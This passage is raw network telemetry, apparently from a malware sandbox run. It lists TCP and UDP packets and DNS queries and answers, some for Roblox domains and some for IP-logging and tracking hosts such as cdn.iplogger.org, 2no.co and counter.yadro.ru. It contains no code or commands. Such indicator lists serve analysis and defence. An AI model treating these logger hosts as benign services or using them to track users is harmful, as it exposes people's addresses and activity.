                                                                                                                Jul 30, 2024 00:49:20.206598997 CEST44349746104.21.4.208192.168.2.9
                                                                                                                Jul 30, 2024 00:49:20.252103090 CEST49746443192.168.2.9104.21.4.208
                                                                                                                Jul 30, 2024 00:49:20.280524969 CEST4434974388.212.201.204192.168.2.9
                                                                                                                Jul 30, 2024 00:49:20.280608892 CEST4434974388.212.201.204192.168.2.9
                                                                                                                Jul 30, 2024 00:49:20.280953884 CEST49743443192.168.2.988.212.201.204
                                                                                                                Jul 30, 2024 00:49:20.281857014 CEST49743443192.168.2.988.212.201.204
                                                                                                                Jul 30, 2024 00:49:20.281884909 CEST4434974388.212.201.204192.168.2.9
                                                                                                                Jul 30, 2024 00:49:20.339958906 CEST44349746104.21.4.208192.168.2.9
                                                                                                                Jul 30, 2024 00:49:20.340008020 CEST44349746104.21.4.208192.168.2.9
                                                                                                                Jul 30, 2024 00:49:20.340059042 CEST44349746104.21.4.208192.168.2.9
                                                                                                                Jul 30, 2024 00:49:20.340063095 CEST49746443192.168.2.9104.21.4.208
                                                                                                                Jul 30, 2024 00:49:20.340090990 CEST44349746104.21.4.208192.168.2.9
                                                                                                                Jul 30, 2024 00:49:20.340107918 CEST44349746104.21.4.208192.168.2.9
                                                                                                                Jul 30, 2024 00:49:20.340152025 CEST49746443192.168.2.9104.21.4.208
                                                                                                                Jul 30, 2024 00:49:20.341438055 CEST49746443192.168.2.9104.21.4.208
                                                                                                                Jul 30, 2024 00:49:20.341460943 CEST44349746104.21.4.208192.168.2.9
                                                                                                                Jul 30, 2024 00:49:20.357779026 CEST44349745184.28.90.27192.168.2.9
                                                                                                                Jul 30, 2024 00:49:20.357870102 CEST49745443192.168.2.9184.28.90.27
                                                                                                                Jul 30, 2024 00:49:20.359870911 CEST49745443192.168.2.9184.28.90.27
                                                                                                                Jul 30, 2024 00:49:20.359878063 CEST44349745184.28.90.27192.168.2.9
                                                                                                                Jul 30, 2024 00:49:20.360141039 CEST44349745184.28.90.27192.168.2.9
                                                                                                                Jul 30, 2024 00:49:20.399698019 CEST49745443192.168.2.9184.28.90.27
                                                                                                                Jul 30, 2024 00:49:20.444494009 CEST44349745184.28.90.27192.168.2.9
                                                                                                                Jul 30, 2024 00:49:20.640281916 CEST44349745184.28.90.27192.168.2.9
                                                                                                                Jul 30, 2024 00:49:20.640353918 CEST44349745184.28.90.27192.168.2.9
                                                                                                                Jul 30, 2024 00:49:20.640619993 CEST49745443192.168.2.9184.28.90.27
                                                                                                                Jul 30, 2024 00:49:20.640619993 CEST49745443192.168.2.9184.28.90.27
                                                                                                                Jul 30, 2024 00:49:20.640660048 CEST49745443192.168.2.9184.28.90.27
                                                                                                                Jul 30, 2024 00:49:20.640676975 CEST44349745184.28.90.27192.168.2.9
                                                                                                                Jul 30, 2024 00:49:20.678009033 CEST49747443192.168.2.9184.28.90.27
                                                                                                                Jul 30, 2024 00:49:20.678057909 CEST44349747184.28.90.27192.168.2.9
                                                                                                                Jul 30, 2024 00:49:20.678273916 CEST49747443192.168.2.9184.28.90.27
                                                                                                                Jul 30, 2024 00:49:20.678522110 CEST49747443192.168.2.9184.28.90.27
                                                                                                                Jul 30, 2024 00:49:20.678543091 CEST44349747184.28.90.27192.168.2.9
                                                                                                                Jul 30, 2024 00:49:20.910489082 CEST6007953192.168.2.91.1.1.1
                                                                                                                Jul 30, 2024 00:49:20.926155090 CEST53600791.1.1.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:20.926299095 CEST6007953192.168.2.91.1.1.1
                                                                                                                Jul 30, 2024 00:49:20.941904068 CEST53600791.1.1.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:21.336513996 CEST44349747184.28.90.27192.168.2.9
                                                                                                                Jul 30, 2024 00:49:21.336587906 CEST49747443192.168.2.9184.28.90.27
                                                                                                                Jul 30, 2024 00:49:21.337852001 CEST49747443192.168.2.9184.28.90.27
                                                                                                                Jul 30, 2024 00:49:21.337862015 CEST44349747184.28.90.27192.168.2.9
                                                                                                                Jul 30, 2024 00:49:21.338104963 CEST44349747184.28.90.27192.168.2.9
                                                                                                                Jul 30, 2024 00:49:21.339317083 CEST49747443192.168.2.9184.28.90.27
                                                                                                                Jul 30, 2024 00:49:21.384540081 CEST44349747184.28.90.27192.168.2.9
                                                                                                                Jul 30, 2024 00:49:21.391017914 CEST6007953192.168.2.91.1.1.1
                                                                                                                Jul 30, 2024 00:49:21.406929016 CEST53600791.1.1.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:21.406996965 CEST6007953192.168.2.91.1.1.1
                                                                                                                Jul 30, 2024 00:49:21.623672009 CEST44349747184.28.90.27192.168.2.9
                                                                                                                Jul 30, 2024 00:49:21.623763084 CEST44349747184.28.90.27192.168.2.9
                                                                                                                Jul 30, 2024 00:49:21.623831034 CEST49747443192.168.2.9184.28.90.27
                                                                                                                Jul 30, 2024 00:49:21.664633036 CEST49747443192.168.2.9184.28.90.27
                                                                                                                Jul 30, 2024 00:49:21.664657116 CEST44349747184.28.90.27192.168.2.9
                                                                                                                Jul 30, 2024 00:49:21.664668083 CEST49747443192.168.2.9184.28.90.27
                                                                                                                Jul 30, 2024 00:49:21.664673090 CEST44349747184.28.90.27192.168.2.9
                                                                                                                Jul 30, 2024 00:49:30.394463062 CEST44349744142.250.184.228192.168.2.9
                                                                                                                Jul 30, 2024 00:49:30.394531965 CEST44349744142.250.184.228192.168.2.9
                                                                                                                Jul 30, 2024 00:49:30.394619942 CEST49744443192.168.2.9142.250.184.228
                                                                                                                Jul 30, 2024 00:49:31.518857002 CEST49744443192.168.2.9142.250.184.228
                                                                                                                Jul 30, 2024 00:49:31.518887997 CEST44349744142.250.184.228192.168.2.9
                                                                                                                Jul 30, 2024 00:49:33.475732088 CEST6111853192.168.2.9162.159.36.2
                                                                                                                Jul 30, 2024 00:49:33.491411924 CEST5361118162.159.36.2192.168.2.9
                                                                                                                Jul 30, 2024 00:49:33.491513968 CEST6111853192.168.2.9162.159.36.2
                                                                                                                Jul 30, 2024 00:49:33.507250071 CEST5361118162.159.36.2192.168.2.9
                                                                                                                Jul 30, 2024 00:49:33.947777033 CEST6111853192.168.2.9162.159.36.2
                                                                                                                Jul 30, 2024 00:49:33.964658022 CEST5361118162.159.36.2192.168.2.9
                                                                                                                Jul 30, 2024 00:49:33.964752913 CEST6111853192.168.2.9162.159.36.2
                                                                                                                Jul 30, 2024 00:49:33.987051010 CEST61119443192.168.2.920.3.187.198
                                                                                                                Jul 30, 2024 00:49:33.987101078 CEST4436111920.3.187.198192.168.2.9
                                                                                                                Jul 30, 2024 00:49:33.987178087 CEST61119443192.168.2.920.3.187.198
                                                                                                                Jul 30, 2024 00:49:33.987524033 CEST61119443192.168.2.920.3.187.198
                                                                                                                Jul 30, 2024 00:49:33.987543106 CEST4436111920.3.187.198192.168.2.9
                                                                                                                Jul 30, 2024 00:49:34.811558008 CEST4436111920.3.187.198192.168.2.9
                                                                                                                Jul 30, 2024 00:49:34.811686993 CEST61119443192.168.2.920.3.187.198
                                                                                                                Jul 30, 2024 00:49:34.813460112 CEST61119443192.168.2.920.3.187.198
                                                                                                                Jul 30, 2024 00:49:34.813472986 CEST4436111920.3.187.198192.168.2.9
                                                                                                                Jul 30, 2024 00:49:34.813734055 CEST4436111920.3.187.198192.168.2.9
                                                                                                                Jul 30, 2024 00:49:34.814852953 CEST61119443192.168.2.920.3.187.198
                                                                                                                Jul 30, 2024 00:49:34.856571913 CEST4436111920.3.187.198192.168.2.9
                                                                                                                Jul 30, 2024 00:49:35.058593988 CEST4436111920.3.187.198192.168.2.9
                                                                                                                Jul 30, 2024 00:49:35.058686018 CEST4436111920.3.187.198192.168.2.9
                                                                                                                Jul 30, 2024 00:49:35.058860064 CEST61119443192.168.2.920.3.187.198
                                                                                                                Jul 30, 2024 00:49:35.059232950 CEST61119443192.168.2.920.3.187.198
                                                                                                                Jul 30, 2024 00:49:35.059257030 CEST4436111920.3.187.198192.168.2.9
                                                                                                                Jul 30, 2024 00:49:35.102745056 CEST61120443192.168.2.920.114.59.183
                                                                                                                Jul 30, 2024 00:49:35.102776051 CEST4436112020.114.59.183192.168.2.9
                                                                                                                Jul 30, 2024 00:49:35.102845907 CEST61120443192.168.2.920.114.59.183
                                                                                                                Jul 30, 2024 00:49:35.103204966 CEST61120443192.168.2.920.114.59.183
                                                                                                                Jul 30, 2024 00:49:35.103214025 CEST4436112020.114.59.183192.168.2.9
                                                                                                                Jul 30, 2024 00:49:36.896433115 CEST61120443192.168.2.920.114.59.183
                                                                                                                Jul 30, 2024 00:49:37.783307076 CEST61121443192.168.2.952.165.165.26
                                                                                                                Jul 30, 2024 00:49:37.783348083 CEST4436112152.165.165.26192.168.2.9
                                                                                                                Jul 30, 2024 00:49:37.783468008 CEST61121443192.168.2.952.165.165.26
                                                                                                                Jul 30, 2024 00:49:37.783792019 CEST61121443192.168.2.952.165.165.26
                                                                                                                Jul 30, 2024 00:49:37.783816099 CEST4436112152.165.165.26192.168.2.9
                                                                                                                Jul 30, 2024 00:49:38.713001013 CEST4436112152.165.165.26192.168.2.9
                                                                                                                Jul 30, 2024 00:49:38.713228941 CEST61121443192.168.2.952.165.165.26
                                                                                                                Jul 30, 2024 00:49:38.714957952 CEST61121443192.168.2.952.165.165.26
                                                                                                                Jul 30, 2024 00:49:38.714973927 CEST4436112152.165.165.26192.168.2.9
                                                                                                                Jul 30, 2024 00:49:38.715250969 CEST4436112152.165.165.26192.168.2.9
                                                                                                                Jul 30, 2024 00:49:38.716434956 CEST61121443192.168.2.952.165.165.26
                                                                                                                Jul 30, 2024 00:49:38.756505966 CEST4436112152.165.165.26192.168.2.9
                                                                                                                Jul 30, 2024 00:49:38.903934002 CEST4436112152.165.165.26192.168.2.9
                                                                                                                Jul 30, 2024 00:49:38.904191017 CEST4436112152.165.165.26192.168.2.9
                                                                                                                Jul 30, 2024 00:49:38.904306889 CEST61121443192.168.2.952.165.165.26
                                                                                                                Jul 30, 2024 00:49:38.904406071 CEST61121443192.168.2.952.165.165.26
                                                                                                                Jul 30, 2024 00:49:38.904406071 CEST61121443192.168.2.952.165.165.26
                                                                                                                Jul 30, 2024 00:49:38.904432058 CEST4436112152.165.165.26192.168.2.9
                                                                                                                Jul 30, 2024 00:49:38.904444933 CEST4436112152.165.165.26192.168.2.9
                                                                                                                Jul 30, 2024 00:49:39.984611988 CEST61122443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:39.984652042 CEST4436112240.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:39.984750032 CEST61122443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:39.985225916 CEST61122443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:39.985235929 CEST4436112240.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:40.805022955 CEST4436112240.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:40.805136919 CEST61122443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:40.806538105 CEST61122443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:40.806566000 CEST4436112240.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:40.806828976 CEST4436112240.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:40.808001995 CEST61122443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:40.852504969 CEST4436112240.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:41.141707897 CEST4436112240.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:41.141757011 CEST4436112240.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:41.141771078 CEST4436112240.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:41.141908884 CEST61122443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:41.141937971 CEST4436112240.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:41.142041922 CEST61122443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:41.144329071 CEST4436112240.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:41.144423008 CEST4436112240.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:41.144445896 CEST61122443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:41.144494057 CEST61122443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:41.144927025 CEST61122443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:41.144927025 CEST61122443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:41.144943953 CEST4436112240.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:41.144953966 CEST4436112240.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:41.322896004 CEST61123443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:41.322925091 CEST4436112340.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:41.322999001 CEST61123443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:41.323396921 CEST61123443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:41.323405981 CEST4436112340.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:42.139254093 CEST4436112340.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:42.139425039 CEST61123443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:42.141288042 CEST61123443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:42.141310930 CEST4436112340.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:42.141638041 CEST4436112340.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:42.142836094 CEST61123443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:42.188492060 CEST4436112340.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:42.478075981 CEST4436112340.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:42.478101015 CEST4436112340.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:42.478131056 CEST4436112340.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:42.478208065 CEST61123443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:42.478234053 CEST4436112340.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:42.478251934 CEST61123443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:42.478280067 CEST61123443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:42.482860088 CEST4436112340.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:42.482898951 CEST4436112340.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:42.482940912 CEST61123443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:42.482949018 CEST4436112340.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:42.482965946 CEST61123443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:42.482975006 CEST4436112340.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:42.483493090 CEST61123443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:42.485455990 CEST61123443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:42.485469103 CEST4436112340.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:42.485493898 CEST61123443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:42.485500097 CEST4436112340.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:47.326420069 CEST49741443192.168.2.923.206.229.209
                                                                                                                Jul 30, 2024 00:49:47.326420069 CEST49741443192.168.2.923.206.229.209
                                                                                                                Jul 30, 2024 00:49:47.326474905 CEST4434974123.206.229.209192.168.2.9
                                                                                                                Jul 30, 2024 00:49:47.326525927 CEST49741443192.168.2.923.206.229.209
                                                                                                                Jul 30, 2024 00:50:19.008589983 CEST61125443192.168.2.9142.250.181.228
                                                                                                                Jul 30, 2024 00:50:19.008634090 CEST44361125142.250.181.228192.168.2.9
                                                                                                                Jul 30, 2024 00:50:19.008814096 CEST61125443192.168.2.9142.250.181.228
                                                                                                                Jul 30, 2024 00:50:19.008970022 CEST61125443192.168.2.9142.250.181.228
                                                                                                                Jul 30, 2024 00:50:19.008981943 CEST44361125142.250.181.228192.168.2.9
                                                                                                                Jul 30, 2024 00:50:19.664407969 CEST44361125142.250.181.228192.168.2.9
                                                                                                                Jul 30, 2024 00:50:19.664683104 CEST61125443192.168.2.9142.250.181.228
                                                                                                                Jul 30, 2024 00:50:19.664701939 CEST44361125142.250.181.228192.168.2.9
                                                                                                                Jul 30, 2024 00:50:19.665220976 CEST44361125142.250.181.228192.168.2.9
                                                                                                                Jul 30, 2024 00:50:19.665517092 CEST61125443192.168.2.9142.250.181.228
                                                                                                                Jul 30, 2024 00:50:19.665571928 CEST44361125142.250.181.228192.168.2.9
                                                                                                                Jul 30, 2024 00:50:19.720438004 CEST61125443192.168.2.9142.250.181.228
                                                                                                                Jul 30, 2024 00:50:29.586137056 CEST44361125142.250.181.228192.168.2.9
                                                                                                                Jul 30, 2024 00:50:29.586210012 CEST44361125142.250.181.228192.168.2.9
                                                                                                                Jul 30, 2024 00:50:29.586266994 CEST61125443192.168.2.9142.250.181.228
                                                                                                                Jul 30, 2024 00:50:31.520147085 CEST61125443192.168.2.9142.250.181.228
                                                                                                                Jul 30, 2024 00:50:31.520179033 CEST44361125142.250.181.228192.168.2.9

                                                                                                                UDP Packets

                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Jul 30, 2024 00:49:01.688865900 CEST5593253192.168.2.91.1.1.1
                                                                                                                Jul 30, 2024 00:49:01.706537962 CEST53559321.1.1.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:02.582036018 CEST4933853192.168.2.91.1.1.1
                                                                                                                Jul 30, 2024 00:49:02.601408005 CEST53493381.1.1.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:15.079936028 CEST5771653192.168.2.91.1.1.1
                                                                                                                Jul 30, 2024 00:49:15.088238955 CEST5043953192.168.2.91.1.1.1
                                                                                                                Jul 30, 2024 00:49:15.096395016 CEST53616661.1.1.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:15.099297047 CEST53577161.1.1.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:15.111344099 CEST53504391.1.1.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:15.132184029 CEST53655021.1.1.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:16.174592972 CEST6320953192.168.2.91.1.1.1
                                                                                                                Jul 30, 2024 00:49:16.174592972 CEST6356953192.168.2.91.1.1.1
                                                                                                                Jul 30, 2024 00:49:16.175045013 CEST6468453192.168.2.91.1.1.1
                                                                                                                Jul 30, 2024 00:49:16.175419092 CEST5580853192.168.2.91.1.1.1
                                                                                                                Jul 30, 2024 00:49:16.414450884 CEST53646841.1.1.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:16.414562941 CEST53558081.1.1.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:16.414840937 CEST53508261.1.1.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:16.416661978 CEST53632091.1.1.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:16.417731047 CEST53635691.1.1.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:17.282303095 CEST6342453192.168.2.91.1.1.1
                                                                                                                Jul 30, 2024 00:49:17.282519102 CEST5095053192.168.2.91.1.1.1
                                                                                                                Jul 30, 2024 00:49:17.299848080 CEST53634241.1.1.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:17.299866915 CEST53509501.1.1.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:17.816975117 CEST6244553192.168.2.91.1.1.1
                                                                                                                Jul 30, 2024 00:49:17.834578037 CEST53624451.1.1.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.803457975 CEST5452053192.168.2.91.1.1.1
                                                                                                                Jul 30, 2024 00:49:18.803853035 CEST6417753192.168.2.91.1.1.1
                                                                                                                Jul 30, 2024 00:49:18.821640015 CEST53545201.1.1.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.822715998 CEST53641771.1.1.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.925489902 CEST6508953192.168.2.91.1.1.1
                                                                                                                Jul 30, 2024 00:49:18.925760984 CEST5456553192.168.2.91.1.1.1
                                                                                                                Jul 30, 2024 00:49:18.943311930 CEST53545651.1.1.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.943326950 CEST53650891.1.1.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:19.683522940 CEST6255253192.168.2.91.1.1.1
                                                                                                                Jul 30, 2024 00:49:19.683684111 CEST5456153192.168.2.91.1.1.1
                                                                                                                Jul 30, 2024 00:49:19.703157902 CEST53625521.1.1.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:19.705604076 CEST53545611.1.1.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:20.910059929 CEST53598331.1.1.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:33.314136028 CEST53610921.1.1.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:33.474468946 CEST5357634162.159.36.2192.168.2.9
                                                                                                                Jul 30, 2024 00:49:33.966759920 CEST6290653192.168.2.91.1.1.1
                                                                                                                Jul 30, 2024 00:49:33.985019922 CEST53629061.1.1.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:37.762084007 CEST6092753192.168.2.91.1.1.1
                                                                                                                Jul 30, 2024 00:49:37.781248093 CEST53609271.1.1.1192.168.2.9
                                                                                                                Jul 30, 2024 00:49:54.351481915 CEST138138192.168.2.9192.168.2.255
                                                                                                                Jul 30, 2024 00:50:18.988418102 CEST5616853192.168.2.91.1.1.1
                                                                                                                Jul 30, 2024 00:50:19.007097006 CEST53561681.1.1.1192.168.2.9

                                                                                                                DNS Queries

                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                Jul 30, 2024 00:49:01.688865900 CEST192.168.2.91.1.1.10x5955Standard query (0)ecsv2.roblox.comA (IP address)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:02.582036018 CEST192.168.2.91.1.1.10x5a56Standard query (0)clientsettingscdn.roblox.comA (IP address)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:15.079936028 CEST192.168.2.91.1.1.10x17abStandard query (0)2no.coA (IP address)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:15.088238955 CEST192.168.2.91.1.1.10xf5dfStandard query (0)2no.co65IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:16.174592972 CEST192.168.2.91.1.1.10xe2f2Standard query (0)cdn.iplogger.orgA (IP address)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:16.174592972 CEST192.168.2.91.1.1.10x6c13Standard query (0)cdn.iplogger.org65IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:16.175045013 CEST192.168.2.91.1.1.10xcd73Standard query (0)counter.yadro.ruA (IP address)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:16.175419092 CEST192.168.2.91.1.1.10x8569Standard query (0)counter.yadro.ru65IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:17.282303095 CEST192.168.2.91.1.1.10xdd23Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:17.282519102 CEST192.168.2.91.1.1.10xa311Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:17.816975117 CEST192.168.2.91.1.1.10x3618Standard query (0)client-telemetry.roblox.comA (IP address)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:18.803457975 CEST192.168.2.91.1.1.10x57efStandard query (0)counter.yadro.ruA (IP address)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:18.803853035 CEST192.168.2.91.1.1.10xeccbStandard query (0)counter.yadro.ru65IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:18.925489902 CEST192.168.2.91.1.1.10x2bc2Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:18.925760984 CEST192.168.2.91.1.1.10x6d68Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:19.683522940 CEST192.168.2.91.1.1.10x8fcfStandard query (0)cdn.iplogger.orgA (IP address)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:19.683684111 CEST192.168.2.91.1.1.10x81efStandard query (0)cdn.iplogger.org65IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:33.966759920 CEST192.168.2.91.1.1.10xebebStandard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:37.762084007 CEST192.168.2.91.1.1.10x7859Standard query (0)26.165.165.52.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:50:18.988418102 CEST192.168.2.91.1.1.10x865bStandard query (0)www.google.comA (IP address)IN (0x0001)false

                                                                                                                DNS Answers

                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                Jul 30, 2024 00:49:01.706537962 CEST1.1.1.1192.168.2.90x5955No error (0)ecsv2.roblox.comtitanium.roblox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:01.706537962 CEST1.1.1.1192.168.2.90x5955No error (0)titanium.roblox.comedge-term4.roblox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:01.706537962 CEST1.1.1.1192.168.2.90x5955No error (0)edge-term4.roblox.comedge-term4-ams2.roblox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:01.706537962 CEST1.1.1.1192.168.2.90x5955No error (0)edge-term4-ams2.roblox.com128.116.21.4A (IP address)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:02.601408005 CEST1.1.1.1192.168.2.90x5a56No error (0)clientsettingscdn.roblox.comd2v57ias1m20gl.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:02.601408005 CEST1.1.1.1192.168.2.90x5a56No error (0)d2v57ias1m20gl.cloudfront.net99.86.4.125A (IP address)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:02.601408005 CEST1.1.1.1192.168.2.90x5a56No error (0)d2v57ias1m20gl.cloudfront.net99.86.4.62A (IP address)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:02.601408005 CEST1.1.1.1192.168.2.90x5a56No error (0)d2v57ias1m20gl.cloudfront.net99.86.4.8A (IP address)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:02.601408005 CEST1.1.1.1192.168.2.90x5a56No error (0)d2v57ias1m20gl.cloudfront.net99.86.4.20A (IP address)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:15.099297047 CEST1.1.1.1192.168.2.90x17abNo error (0)2no.co172.67.149.76A (IP address)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:15.099297047 CEST1.1.1.1192.168.2.90x17abNo error (0)2no.co104.21.79.229A (IP address)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:15.111344099 CEST1.1.1.1192.168.2.90xf5dfNo error (0)2no.co65IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:16.414450884 CEST1.1.1.1192.168.2.90xcd73No error (0)counter.yadro.ru88.212.202.52A (IP address)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:16.414450884 CEST1.1.1.1192.168.2.90xcd73No error (0)counter.yadro.ru88.212.201.204A (IP address)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:16.414450884 CEST1.1.1.1192.168.2.90xcd73No error (0)counter.yadro.ru88.212.201.198A (IP address)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:16.416661978 CEST1.1.1.1192.168.2.90xe2f2No error (0)cdn.iplogger.org104.21.4.208A (IP address)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:16.416661978 CEST1.1.1.1192.168.2.90xe2f2No error (0)cdn.iplogger.org172.67.132.113A (IP address)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:16.417731047 CEST1.1.1.1192.168.2.90x6c13No error (0)cdn.iplogger.org65IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:17.299848080 CEST1.1.1.1192.168.2.90xdd23No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:17.834578037 CEST1.1.1.1192.168.2.90x3618No error (0)client-telemetry.roblox.comtitanium.roblox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:17.834578037 CEST1.1.1.1192.168.2.90x3618No error (0)titanium.roblox.comedge-term4.roblox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:17.834578037 CEST1.1.1.1192.168.2.90x3618No error (0)edge-term4.roblox.comedge-term4-ams2.roblox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:17.834578037 CEST1.1.1.1192.168.2.90x3618No error (0)edge-term4-ams2.roblox.com128.116.21.4A (IP address)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:18.821640015 CEST1.1.1.1192.168.2.90x57efNo error (0)counter.yadro.ru88.212.201.204A (IP address)IN (0x0001)false
